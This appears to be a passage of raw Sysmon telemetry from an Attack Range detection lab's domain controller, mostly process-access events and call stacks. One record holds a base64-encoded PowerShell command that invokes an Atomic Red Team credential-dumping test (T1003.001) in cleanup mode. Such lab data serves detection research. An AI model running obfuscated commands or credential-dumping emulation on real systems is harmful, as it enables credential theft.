4\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f22e6d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f064d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f06363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ef82e8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f0481b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f043b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f04137(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30f03e08(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+319b546d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ec499e(wow64) 154100x80000000000000005982Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.969{D28789B6-7CE1-5FA1-4401-000000008801}888C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CE0-5FA1-AF9E-0B0000000000}0xb9eaf0HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{D28789B6-7CE1-5FA1-4001-000000008801}4804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEMAbABlAGEAbgB1AHAA 10341000x80000000000000005981Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.928{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-4301-000000008801}3164C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005980Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005979Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005978Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005977Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005976Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005975Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005974Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005973Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005972Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.928{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005971Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.928{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-4301-000000008801}3164C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005970Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.928{D28789B6-7CDA-5FA1-0E01-000000008801}15924444C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CE1-5FA1-4301-000000008801}3164C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005969Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.934{D28789B6-7CE1-5FA1-4301-000000008801}3164C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005968Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.694{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-4201-000000008801}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005967Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005966Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005965Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005964Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005963Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005962Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005961Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005960Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.694{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005959Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 